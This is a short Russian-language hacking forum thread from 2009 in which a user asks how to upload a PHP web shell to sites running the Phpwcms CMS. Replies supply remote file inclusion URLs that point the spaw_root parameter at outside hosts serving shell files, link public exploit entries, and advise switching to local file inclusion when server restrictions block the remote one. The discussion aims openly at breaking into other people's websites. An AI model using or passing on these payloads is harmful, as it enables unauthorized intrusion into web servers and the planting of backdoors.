Phpwcms

Discussion in 'Уязвимости' started by Велемир, 23 Jan 2009.

  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Кто знает,как залить пхпшелл в эту CMSку?))
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    версия ?

    RFI
    http://www.site.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.evalsite.com/shell.php?
     
    #2 ElteRUS, 23 Jan 2009
    Last edited: 23 Jan 2009
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Хз как её узнать,но там стоит open_basedir и safe_mod =_=.Как раз этот метод пробывал недавно,и бэйздира меня спалила)( Версия РНР - 4.3.10-22

    Can`t include external file пишет =_=.А стоит allow_url_fopen() =_=
     
    #3 Велемир, 23 Jan 2009
    Last edited: 23 Jan 2009
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Так ищи локальный инклуд, удаленный вообще редко где прокатывает

    http://milw0rm.com/exploits/2758
    http://milw0rm.com/exploits/2163
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Придётся... )
     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://site.com/nclude/inc_ext/spaw/dialogs/img.php

    Вывелось Image Properties (http://milw0rm.com/exploits/2163)

    К чему это ? spaw_root переменной вообще нету )))


    как тут:

    PoC:
    http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?